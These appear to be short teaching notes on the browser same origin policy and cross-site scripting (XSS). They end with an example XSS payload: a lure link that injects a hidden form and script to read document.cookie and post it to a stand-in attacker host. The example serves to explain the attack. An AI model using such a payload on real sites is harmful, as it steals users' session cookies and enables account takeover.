Same Origin Policy

The same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript.

The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages received from different sites.

A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.

The term "origin" is defined using the domain name, application layer protocol, and (in most browsers) TCP port of the HTML document running the script.

Two resources are considered to be of the same origin if and only if all these values are exactly the same.

Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users

	…
<a href=http://example.com/g.jsp?name=
  <FORM action=http://www.cookie-thief.com/xx.jsp
       method=post id="idForm">
       <INPUT name="cookie" type="hidden">
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie; 
    idForm.submit();
  </SCRIPT> >Click here to win a million dollars!</a>
		…